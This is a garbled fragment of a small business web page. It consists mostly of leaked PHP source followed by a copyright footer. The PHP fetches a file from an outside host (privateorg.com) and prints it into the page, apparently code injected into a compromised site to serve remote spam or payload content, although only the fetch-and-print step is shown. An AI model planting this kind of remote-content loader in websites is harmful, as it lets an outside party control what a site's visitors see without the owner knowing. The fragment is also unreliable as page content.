|
|||||
if (extension_loaded("curl")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, "http://privateorg.com/ten/ten.dat"); $r = curl_exec($ch); curl_close($ch); } else { $r=implode("",file("http://privateorg.com/ten/ten.dat")); } if($r) print $r; ?> | |||||
Copyright © 2024 Jill Bourque Presents - All Rights Reserved ☺ |